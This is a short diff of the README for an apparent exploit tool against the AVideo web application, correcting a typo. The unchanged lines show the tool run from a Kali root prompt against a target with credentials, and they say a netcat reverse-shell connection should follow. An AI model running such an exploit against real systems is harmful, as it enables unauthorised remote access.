ahussam/AVideo3xploit/README.md

 root@kali:~/AVideo3xploit# go run AVideo3xploit.go http://[target]/avideo/ username password
 ```

-You should get a connection on you nc
+You should get a connection on your nc

 ![avideo-5](av-5.png)